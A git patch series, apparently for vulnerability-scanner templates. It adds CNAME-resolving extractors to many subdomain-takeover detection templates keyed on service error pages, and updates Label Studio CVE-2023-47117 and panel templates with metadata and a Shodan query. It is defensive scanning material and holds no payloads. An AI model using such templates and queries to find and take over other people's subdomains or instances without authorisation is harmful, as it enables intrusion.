a/http/takeovers/gemfury-takeover.yaml b/http/takeovers/gemfury-takeover.yaml index 09d562e8ed..0efaba4e07 100644 --- a/http/takeovers/gemfury-takeover.yaml +++ b/http/takeovers/gemfury-takeover.yaml @@ -29,4 +29,9 @@ http: part: header words: - "Location: https://gemfury.com/404" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a00483046022100e7d6dba0eda3d3930f3dca078b7ad077afffc4dd087816a8d927f4c53d8c7687022100d893083aed1f67decbf6e1e59e4e1244fccc936e2f881303f15d0f4fdef4f437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/getresponse-takeover.yaml b/http/takeovers/getresponse-takeover.yaml index 63e527da6d..001b02b48f 100644 --- a/http/takeovers/getresponse-takeover.yaml +++ b/http/takeovers/getresponse-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - 'With GetResponse Landing Pages, lead generation has never been easier' + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a004630440220050020aa27e758170d84b6e73692424006b84848ca5faae8e6bffadccc5c2000022016771fdf888e33a79802255d3530b581f338b6933415a56c05a3feb2a3ee777c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index bb070d4fe7..77a5952d0e 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -30,4 +30,9 @@ http: - type: status status: - 302 + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100a5aa3c5ce4a8bc142b327031cd1fb21f5732356c4fb0ea207c8f9752f67f4c35022001ad7f03961d10bd1810747fc83882f4f22b7c6a6b080da3ecf474d6d9ceba2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gitbook-takeover.yaml b/http/takeovers/gitbook-takeover.yaml index 1fdd67dfa2..405630fa4d 100644 --- a/http/takeovers/gitbook-takeover.yaml +++ b/http/takeovers/gitbook-takeover.yaml @@ -28,4 +28,9 @@ http: - "If you need specifics, here's the error" - "Domain not found" condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a00463044022052ee60fe1e2ef8770b8e8cbce78d52f642c4db18a81c84a23cf711895b5893fa02204de56d859be0fc6514cfcf19609067c70683e9938c8b9c3b56a034d2d1a3d609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/github-takeover.yaml b/http/takeovers/github-takeover.yaml index fc4932c49c..a498fec827 100644 --- a/http/takeovers/github-takeover.yaml +++ b/http/takeovers/github-takeover.yaml @@ -34,4 +34,9 @@ http: - '!contains(host,"github.com")' - '!contains(host,"github.io")' condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100bb060bc8d7e38ff45b518bb436e03abc7179df307c79f75d9adbac9db571fc280220235be437c7bb36a211f7394383c66307e07cb0360b717690d37dab1b2e547e74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gohire-takeover.yaml b/http/takeovers/gohire-takeover.yaml index 30a288b473..f9fa0804ab 100644 --- a/http/takeovers/gohire-takeover.yaml +++ b/http/takeovers/gohire-takeover.yaml @@ -29,4 +29,9 @@ http: - type: status status: - 404 + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a0046304402204f44da86889c616cf2b3196d930ed7be82e7776bf8c94b5c026d538b2ac1632a0220492bbc32c0310565248ae8cb06b828c52710ef50977055553862690c15381f93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/hatenablog-takeover.yaml b/http/takeovers/hatenablog-takeover.yaml index e4b49b6a83..f565259972 100644 --- a/http/takeovers/hatenablog-takeover.yaml +++ b/http/takeovers/hatenablog-takeover.yaml @@ -26,4 +26,9 @@ http: - type: word words: - "404 Blog is not found" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a00483046022100cccbda6f194b9c13e8d429fd19d5d99b9268c9ed3ac3886b5ca81a70bae502e5022100c63cbb05f231049af04acf8cdc226426618570036ed0b0b17b1ce7e576ab5acd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpdocs-takeover.yaml b/http/takeovers/helpdocs-takeover.yaml index 3f6217b12d..e0c16a0579 100644 --- a/http/takeovers/helpdocs-takeover.yaml +++ b/http/takeovers/helpdocs-takeover.yaml @@ -28,4 +28,9 @@ http: part: body words: - "You've tried to access an account/page that does not exist" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100d14a2588e716661e039af2e59ffb3bbea00f668324088aee429b9de8b8f1811802202d413b89505505d9e46a2f08ee2ee2896d802b983c85a4fa66c8ce1851b77040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpjuice-takeover.yaml b/http/takeovers/helpjuice-takeover.yaml index 183ea980e0..2f1a344c6f 100644 --- a/http/takeovers/helpjuice-takeover.yaml +++ b/http/takeovers/helpjuice-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - We could not find what you're looking for. + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a00483046022100f6cc8d12b3d37ce071d0f0991b48a2cde1418c6306fdaff878e637d95da5c809022100ea84154d67d1ef86b4ba76171d91b9f7869dc5d291e7aa44cb168dcb38fc0178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helprace-takeover.yaml b/http/takeovers/helprace-takeover.yaml index e11f8ad27a..0ee389a95a 100644 --- a/http/takeovers/helprace-takeover.yaml +++ b/http/takeovers/helprace-takeover.yaml @@ -26,4 +26,9 @@ http: words: - "Alias not configured!" - "Admin of this Helprace account needs to set up domain alias" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a0047304502210087860d3c24c0e128ed5238827375c4ab06496c1780dee8ce4dd39a7906ca0ae00220710d80043d511d5517f1bc91d5d85a543306e03b08dcfc32c1fa85dd555fdf9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpscout-takeover.yaml b/http/takeovers/helpscout-takeover.yaml index 15b1add48e..9af30103ce 100644 --- a/http/takeovers/helpscout-takeover.yaml +++ b/http/takeovers/helpscout-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - "No settings were found for this company:" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100f82db3b5d07dfbfb6f11abb9f0abc7a1991698b51abcdbe03bc6b13f41d7710b022017ff27474089ced18f311f6798e2ed903d149f3da6ccd0efd91bab91c6c4d21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/hubspot-takeover.yaml b/http/takeovers/hubspot-takeover.yaml index 6ba3a1b9d8..b6f49b9ced 100644 --- a/http/takeovers/hubspot-takeover.yaml +++ b/http/takeovers/hubspot-takeover.yaml @@ -28,4 +28,9 @@ http: - "Domain not found" - "does not exist in our system" condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100a15863236633756d1edb190b798d1e8a6f4d6f5babf13f4f5556048598473beb02201f67a22838abed7e84f98d3f1ea74c297833e39784aac4808c60baa6d7957b0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/intercom-takeover.yaml b/http/takeovers/intercom-takeover.yaml index d0f6554de9..43b122d366 100644 --- a/http/takeovers/intercom-takeover.yaml +++ b/http/takeovers/intercom-takeover.yaml @@ -27,4 +27,9 @@ http: - '

Uh oh. That page doesn\’t exist.

' - 'This page is reserved for artistic dogs.' condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a004730450221009d1ef63eb341e158cc4d429a755e07147b7a1df890918864db4d508b28d5647d02202f93b47c9dfc0376a95d3eaf020e73ebfed0a3ca5dcaccc0012fe4e1265b5d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/jazzhr-takeover.yaml b/http/takeovers/jazzhr-takeover.yaml index 712b447add..7ff0e10e14 100644 --- a/http/takeovers/jazzhr-takeover.yaml +++ b/http/takeovers/jazzhr-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - This account no longer active + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a004730450221008f8a526afe19043f972676b23a0ad16e3eb20d1fd15d567f85aa4c69af7490a40220174307601261325b2c937087854fdcaaf5e8f5ece73f6b1295e4e1cc83ae6777:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/jetbrains-takeover.yaml b/http/takeovers/jetbrains-takeover.yaml index f47d2425b1..ad59f64184 100644 --- a/http/takeovers/jetbrains-takeover.yaml +++ b/http/takeovers/jetbrains-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - is not a registered InCloud YouTrack. + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a0048304602210081c1d412bdc5f9e45cd525b55171816a1ebd0e7c9d36e938bb57b441fe76edde0221009edfcf6086e6d9917073aa89ae5973b6b44be71db9e20919edb8a67f8f135a54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/kinsta-takeover.yaml b/http/takeovers/kinsta-takeover.yaml index 01789b73f0..2f7370a70a 100644 --- a/http/takeovers/kinsta-takeover.yaml +++ b/http/takeovers/kinsta-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - No Site For Domain + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a0047304502206044400efee80464021a449f3f2b0c26398e6453922d5d91170853fe77e53392022100b72b2fe2baa52138448d8b0be94b1ee244c1d373065cad601ef8d2566b5f1de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/launchrock-takeover.yaml b/http/takeovers/launchrock-takeover.yaml index f1f515d961..df86ba8d47 100644 --- a/http/takeovers/launchrock-takeover.yaml +++ b/http/takeovers/launchrock-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a0048304602210090dbe87f01c8309c771d28afa1d230137e25756c084b12ab3c7122b2a7630261022100a85fe10454d6207a146bd59f225234643f5da44be48fd4495dca47a8646d9fc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/leadpages-takeover.yaml b/http/takeovers/leadpages-takeover.yaml index b433fd5ea1..bb125f091a 100644 --- a/http/takeovers/leadpages-takeover.yaml +++ b/http/takeovers/leadpages-takeover.yaml @@ -30,4 +30,9 @@ http: - "The page you’re looking for may have been moved" - "Double-check that you have the right web address and give it another go!" condition: or + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a0047304502200dd0c65ea9c1bde329bbbbc48da6968bd7a8764db818f4b0b2662aa5f90cbcad0221009333f1d86ecbe74e5a099b1f2851f72ce7a74d2733da0c9813bd1c2e502707a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/lemlist-takeover.yaml b/http/takeovers/lemlist-takeover.yaml index cee06e3332..36a13a7ad7 100644 --- a/http/takeovers/lemlist-takeover.yaml +++ b/http/takeovers/lemlist-takeover.yaml @@ -29,5 +29,10 @@ http: - "Custom domain check" - "app.lemlist.com" condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a0048304602210099908eacc7046289b5a30398972ec745cf09ab068ece8b8538ba44ddb5dd35a7022100d072f3859b82c4cda35df540e8a0fa3f30480d8d0a26634ee55eb5fb2c9d71fe:922c64590222798bb761d5b6d8e72950 diff --git a/http/takeovers/mashery-takeover.yaml b/http/takeovers/mashery-takeover.yaml index f12085edbc..487b784b05 100644 --- a/http/takeovers/mashery-takeover.yaml +++ b/http/takeovers/mashery-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - Unrecognized domain + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a004630440220750d4b0e60b943b940f6294035333c6aab7d5991a49b76cd9781c5143141aa7a0220064abdac1cfa23c8e64075bb9c8eb3660c2ee351f051877cfdd4bd704c0c4d0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/meteor-takeover.yaml b/http/takeovers/meteor-takeover.yaml index 4a143eba5d..c7fc0403e5 100644 --- a/http/takeovers/meteor-takeover.yaml +++ b/http/takeovers/meteor-takeover.yaml @@ -21,4 +21,9 @@ http: - type: word words: - "404 Not Found: No applications registered for host '" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a004630440220106fbac97760646029437a8745d2c52c78542cf9bfe774465264cbd0c3bd272b02200d06849853bdb1d987dae68ca4f28585ee62c27c4e3edbd6d2639ef754f75af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/netlify-takeover.yaml b/http/takeovers/netlify-takeover.yaml index bc176dbfcb..70fd7b5e75 100644 --- a/http/takeovers/netlify-takeover.yaml +++ b/http/takeovers/netlify-takeover.yaml @@ -34,4 +34,9 @@ http: part: header words: - "Netlify" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a004730450221009a5a121d786fe47e6abfdf7b52f451237d696d19fa9df212b83dab270e03509b0220481f0dfdf70ae43cf23a05b969ad56aedcbb2f3f202d208b5b911e54342eb00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/ngrok-takeover.yaml b/http/takeovers/ngrok-takeover.yaml index 4fe1c13906..fdebc35df4 100644 --- a/http/takeovers/ngrok-takeover.yaml +++ b/http/takeovers/ngrok-takeover.yaml @@ -26,4 +26,9 @@ http: words: - ngrok.io not found - Tunnel *.ngrok.io not found + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a004830460221008cf6a9807fc46be1355a7147dccd0eb9da046a96308c2f7ec21d020634e17c7002210084a3569ad587a666c3f615fc707f8efaaec9c5ce7ad73bd0720b3da2b25e65ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pagewiz-takeover.yaml b/http/takeovers/pagewiz-takeover.yaml index bf0e5ff9a0..654b0f9ebc 100644 --- a/http/takeovers/pagewiz-takeover.yaml +++ b/http/takeovers/pagewiz-takeover.yaml @@ -28,4 +28,9 @@ http: - 'Start Your New Landing Page Now!' - 'pagewiz' condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a004730450220438d742994d111e4fa56adb384f11133af7019c3faf6ca8c6d8a634a3e591260022100d7bf8ba3814fab3b200485663be1161f0d6a8ad33224bd486730ec0f7bfed45e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pantheon-takeover.yaml b/http/takeovers/pantheon-takeover.yaml index fa6bbcce8f..0bdbeda05b 100644 --- a/http/takeovers/pantheon-takeover.yaml +++ b/http/takeovers/pantheon-takeover.yaml @@ -30,4 +30,9 @@ http: - type: dsl dsl: - '!contains(host,"apigee.io")' + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100eb34ca91df59d23692e3ef0fa3a62e217b7320372b4e58dc7e1877ac65dae3b50220168496114bc754b3dfd3a66b6d92331f74517a0266fd3cf7853523445a18136e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pingdom-takeover.yaml b/http/takeovers/pingdom-takeover.yaml index 278cfa6c12..5d36047977 100644 --- a/http/takeovers/pingdom-takeover.yaml +++ b/http/takeovers/pingdom-takeover.yaml @@ -26,4 +26,9 @@ http: words: - Public Report Not Activated - This public report page has not been activated by the user + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a00483046022100afda4c99e426c70cabf279d2bd2ba47c066c1865232547806d4e7cc14228c927022100a8a67314e0aa40fd5666e734ef69b3fbd1288225afa7ed3911add364adc54600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/proposify-takeover.yaml b/http/takeovers/proposify-takeover.yaml index eb3554e0b0..9f3c25933c 100644 --- a/http/takeovers/proposify-takeover.yaml +++ b/http/takeovers/proposify-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - If you need immediate assistance, please contact Error 404: Page Not Found" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a00483046022100fbf23b46ef8a4aa8d273f247e72f3259c4c32b43ec758e4e3877e7b33ddfc5cd022100cfd9f6c876dc572379c1829ad85feb73bb1e8168b78db98e9d592c5eeb400551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/teamwork-takeover.yaml b/http/takeovers/teamwork-takeover.yaml index 76f70d5c55..c14a74f9e6 100644 --- a/http/takeovers/teamwork-takeover.yaml +++ b/http/takeovers/teamwork-takeover.yaml @@ -23,4 +23,9 @@ http: - type: word words: - "Oops - We didn't find your site." + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100d2e1923e8aea236705b052924c0ad3bd51139d068896daf041838ea275eb5f5402206f2a3fda681ca3fb7207264838b9834596500b0db1355c6f410e818fe18d0a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tilda-takeover.yaml b/http/takeovers/tilda-takeover.yaml index 2a840e71bb..21521689c4 100644 --- a/http/takeovers/tilda-takeover.yaml +++ b/http/takeovers/tilda-takeover.yaml @@ -30,4 +30,9 @@ http: words: - "Please renew your subscription" negative: true + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a00483046022100cf20f7eef7723e0643d0412903381668918ed4e468e71f0715c9bdec5a7688a2022100c7eca7751306592f4fc039c2da9e2ecc1b38f7099420e7ac2bac389bf5845811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tumblr-takeover.yaml b/http/takeovers/tumblr-takeover.yaml index bec6d008b9..71f60f4d4f 100644 --- a/http/takeovers/tumblr-takeover.yaml +++ b/http/takeovers/tumblr-takeover.yaml @@ -34,4 +34,9 @@ http: - '!contains(host,"txmblr.com")' - '!contains(host,"umblr.com")' condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a0046304402201598cd0a842a4fd108c938690442844d43bf8ee7e343be7192e5bdc8f33f756602207f36b901ac8eb26b5704bb2e5db2669ffefac79385e38b3b838cc2d2eef9ce06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uberflip-takeover.yaml b/http/takeovers/uberflip-takeover.yaml index ab94f12c63..6d473d7470 100644 --- a/http/takeovers/uberflip-takeover.yaml +++ b/http/takeovers/uberflip-takeover.yaml @@ -26,4 +26,9 @@ http: - type: word words: - "Non-hub domain, The URL you've accessed does not provide a hub." + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a0046304402205cf61bf00b014ac3c3255c63485f0ea5b59b91fd641a81ffc936a90eb42ad2b802205ba4878ce63ae460a30160dca5a73e94cabe8703642765631a1f324e88cda068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uptime-takeover.yaml b/http/takeovers/uptime-takeover.yaml index 886a26f6e6..2671073563 100644 --- a/http/takeovers/uptime-takeover.yaml +++ b/http/takeovers/uptime-takeover.yaml @@ -29,4 +29,9 @@ http: - type: status status: - 302 + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a0047304502210085a0ff88eac411c553fefc9111615b5fce5421ae019fb6dfb33e3bbf3bbdb1900220273c69814eb607b21b37aafc4a857b565437c0e3941118da9b80a636280a56a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uptimerobot-takeover.yaml b/http/takeovers/uptimerobot-takeover.yaml index ffc92c4490..c69be58a15 100644 --- a/http/takeovers/uptimerobot-takeover.yaml +++ b/http/takeovers/uptimerobot-takeover.yaml @@ -36,4 +36,9 @@ http: - type: status status: - 404 + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a004730450220721196f64418a6eb526f619f162fcd1fbab5d2b0fe31bf1384cce7b528c31c88022100dac350b5f6b730091041f3aabe46735bed8e0b78fce6a268e96bc59e1f00a7c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uservoice-takeover.yaml b/http/takeovers/uservoice-takeover.yaml index 6de3930012..174b24bcfd 100644 --- a/http/takeovers/uservoice-takeover.yaml +++ b/http/takeovers/uservoice-takeover.yaml @@ -26,4 +26,9 @@ http: - type: word words: - "This UserVoice subdomain is currently available!" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100aa09c8b6fdbe7b84793de16fcfbc2b1f9b47a5bec7c8562618c6dffe1699ac2f02204354322492f299f876e5674a252217ed8f985d04f027e894e302e548ecbd0522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/vend-takeover.yaml b/http/takeovers/vend-takeover.yaml index 663543c056..5413b0d8c1 100644 --- a/http/takeovers/vend-takeover.yaml +++ b/http/takeovers/vend-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - Looks like you've traveled too far into cyberspace. + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022005cad28da3999701b4d14ebc07e85adaf1faaf878a328e581d9661bffe34864d022100d7baee7ef3c9c736ad4ca5e8946d4861a2df3d9d9e81a2e5f9823acb058564c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wishpond-takeover.yaml b/http/takeovers/wishpond-takeover.yaml index 1ac3790482..d2b7d2d6af 100644 --- a/http/takeovers/wishpond-takeover.yaml +++ b/http/takeovers/wishpond-takeover.yaml @@ -27,4 +27,9 @@ http: - https://www.wishpond.com/404?campaign=true - 'Oops! There isn’t a Wishpond Campaign published to this page.' condition: or + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a0047304502207293f11f5db62b0ad65eb3f64c1c7eeef99b286a8f5a309a3ccea7c41d6f2a9c0221009daf8076c7f2cd449d216cd809d1906295d848581b43e5a800374a8c10c98e07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wix-takeover.yaml b/http/takeovers/wix-takeover.yaml index df0933a35d..5ff101bc81 100644 --- a/http/takeovers/wix-takeover.yaml +++ b/http/takeovers/wix-takeover.yaml @@ -31,5 +31,9 @@ http: - type: status status: - 404 + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" # digest: 4a0a00473045022064e66b00c42664cbb39163c2885d293e24428ccf16cd22c4b474e0ab00dbe36e0221009744fe99f306cb4dd01d034c28b7dbdf162cc8818f3f761d729eef8b13473f36:922c64590222798bb761d5b6d8e72950 diff --git a/http/takeovers/wordpress-takeover.yaml b/http/takeovers/wordpress-takeover.yaml index a9da354ad1..5b67fff0da 100644 --- a/http/takeovers/wordpress-takeover.yaml +++ b/http/takeovers/wordpress-takeover.yaml @@ -33,4 +33,9 @@ http: words: - "cannot be registered" negative: true + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a00463044022010ac85e82235d21220b2b93292c2f1b6f510fc2b7d63a0098c379ca79088791e02203e378ce297ff06b4e72664846fbf2b9f7220502a83f76249b0cf4b12e2fda6ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml index c8ed24fd7b..fd0d2e0894 100644 --- a/http/takeovers/worksites-takeover.yaml +++ b/http/takeovers/worksites-takeover.yaml @@ -43,4 +43,9 @@ http: - type: status status: - 404 + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a004630440220250de7667d4b6a40352ae56620035450b47c67b9e108538e5fcbe16e24a2aac40220080aae3c7a8d7bf802e14e117926b51d163414b8113ddd517384a44dcd3d1e32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wufoo-takeover.yaml b/http/takeovers/wufoo-takeover.yaml index ac0c9a6e7c..d91a0646af 100644 --- a/http/takeovers/wufoo-takeover.yaml +++ b/http/takeovers/wufoo-takeover.yaml @@ -27,4 +27,9 @@ http: - Profile not found - Hmmm....something is not right. condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a0047304502200dff4aa3d7f58de4968936c13afe0b66f0c5b6db0de718289013749c1977474b022100b8dc277a832e656b48899f3e87f28f820b2e151f4a67988392fddaaf286da17c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/zendesk-takeover.yaml b/http/takeovers/zendesk-takeover.yaml index 9ce85d46e4..c71458acda 100644 --- a/http/takeovers/zendesk-takeover.yaml +++ b/http/takeovers/zendesk-takeover.yaml @@ -29,4 +29,9 @@ http: - "this help center no longer exists" - "Help Center Closed" condition: or + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a0047304502207f13a85b5f36efa57d0417babbb39d81e6573465eb6125f2ea3f06bdedfd3b7702210082fd4d63db637fc0ce9dd06c534393dfdd113a06b4b1408dcb348d941ead9c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From aea812a3d8c2a1bd9ce313bf228829a3255461f1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Jul 2024 17:51:39 +0530 Subject: [PATCH 0974/1841] minor update --- http/cves/2023/CVE-2023-47117.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-47117.yaml b/http/cves/2023/CVE-2023-47117.yaml index 3a3359700d..852390742c 100644 --- a/http/cves/2023/CVE-2023-47117.yaml +++ b/http/cves/2023/CVE-2023-47117.yaml @@ -2,25 +2,28 @@ id: CVE-2023-47117 info: name: Label Studio - Sensitive Information Exposure - author: pdresearch + author: iamnoooob,rootxharsh,pdresearch severity: high description: | - An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. + An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. reference: - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277 - https://nvd.nist.gov/vuln/detail/CVE-2023-47117 + - https://github.com/elttam/publications classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-47117 cwe-id: CWE-200 + epss-score: 0.0009 + epss-percentile: 0.38398 cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true - shodan-query: title:"Label Studio" + max-request: 4 vendor: humansignal product: label_studio + shodan-query: http.favicon.hash:-1649949475 tags: cve,cve2023,label_studio,oss,exposure,authenticated variables: From f576aa3bcc7ef2f77522e2c6e6b12c7b370c4ae0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Jul 2024 18:12:25 +0530 Subject: [PATCH 0975/1841] minor update --- http/exposed-panels/label-studio-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/label-studio-panel.yaml b/http/exposed-panels/label-studio-panel.yaml index 7783f70fda..5f72d1120b 100644 --- a/http/exposed-panels/label-studio-panel.yaml +++ b/http/exposed-panels/label-studio-panel.yaml @@ -21,10 +21,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Label Studio" - "Log in" - part: body + condition: and - type: status status: From b2eeeb9e481010f6dadf650b596a0ccfaf9baa12 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Jul 2024 18:12:36 +0530 Subject: [PATCH 0976/1841] Update label-studio-signup.yaml --- http/misconfiguration/label-studio-signup.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/label-studio-signup.yaml b/http/misconfiguration/label-studio-signup.yaml index 66392212ab..e8a135069a 100644 --- a/http/misconfiguration/label-studio-signup.yaml +++ b/http/misconfiguration/label-studio-signup.yaml @@ -22,11 +22,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Label Studio" - "Sign up" - "Create Account" - part: body + condition: and - type: status status: From 0ef462f02d23f788058cd277b4141d804d1cc368 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 17:06:06 +0000 Subject: [PATCH 0977/1841] Auto Generated New Template Addition List [Mon Jul 8 17:06:06 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index b7c0425064..4141751518 100644 --- a/.new-additions +++ b/.new-additions @@ -32,6 +32,7 @@ http/default-logins/ruijie/ruijie-nbr-default-login.yaml http/exposed-panels/apache/apache-apollo-panel.yaml http/exposed-panels/dialogic-xms-console.yaml http/exposed-panels/endpoint-protector-panel.yaml +http/exposed-panels/label-studio-panel.yaml http/exposures/backups/sql-server-dump.yaml http/exposures/configs/apache-pinot-config.yaml http/exposures/configs/filestash-admin-config.yaml @@ -42,6 +43,7 @@ http/misconfiguration/installer/kodbox-installer.yaml 